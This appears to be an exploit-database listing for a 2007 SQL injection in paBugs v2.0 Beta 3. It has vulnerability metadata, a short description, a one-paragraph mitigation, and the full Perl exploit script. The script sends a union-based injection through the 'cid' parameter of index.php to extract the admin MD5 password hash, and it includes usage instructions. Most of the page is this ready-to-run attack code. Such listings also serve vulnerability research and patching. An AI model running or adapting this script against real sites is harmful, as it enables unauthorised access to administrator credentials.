header-logo
Suggest Exploit
vendor:
paBugs
by:
umpi
7.5
CVSS
HIGH
Sql-Injection
89
CWE
Product Name: paBugs
Affected Version From: paBugs v2.0 Beta 3
Affected Version To: paBugs v2.0 Beta 3
Patch Exists: NO
Related CWE:
CPE: a:pabugs:pabugs:2.0_beta_3
Metasploit:
Other Scripts:
Platforms Tested:
2007

paBugs <= v2.0 Beta 3 Sql-Injection exploit

This exploit allows an attacker to retrieve the admin password(md5) from the paBugs v2.0 Beta 3 application. It uses a union-based SQL injection technique to extract the password from the admin table.

Mitigation:

The vendor should release a patch that fixes the SQL injection vulnerability. In the meantime, users should consider implementing input validation and parameterized queries to prevent SQL injection attacks.
Source

Exploit-DB raw data:

#!/usr/bin/perl
use LWP::UserAgent;
use HTTP::Cookies;

if(@ARGV < 4)
{
    usage();
    exit();
}

$host = $ARGV[0]; # Host
$path = $ARGV[1]; # Path to paBugs directory
$pref = $ARGV[2]; # prefix for admin tables
$usid = $ARGV[3]; # user id

$www = new LWP::UserAgent;
$sql = "$host/$path/index.php?cid=1'+union+select+1,2,3,password,5+from+$pref\_admins+where+id=$usid/*";
print "\n\n [~] Searching password for user(admin)=$usid \n";
$res = $www -> get($sql) or err();
$res -> content() =~ /([0-9,a-f]{32})/ or err();
print "\n [+] Admin Password(md5)=$usid is: $1 \n\n";

sub usage()
{
print "~---------------------------------------------------------~\n";
print "|                  Bug Found by: umpi                 |\n";
print "~---------------------------------------------------------~\n";
print "|    paBugs <= v2.0 Beta 3 Sql-Injection exploit          |\n";
print "| Usage: pabugs.pl [site] [folder] [prefix] [user_id] |\n";
print "| Example: pabugs.pl http://localhost /pabugs pa 1              |\n";
print "| Coded by p-range   // cf-team.net   // p-range.info     |\n";
print "~---------------------------------------------------------~\n";
}

sub err()
{
print "\n [-] Site is not vulnerable !";
exit();
}

# milw0rm.com [2007-08-02]

Navigation

Suggest Exploit

Services By CQR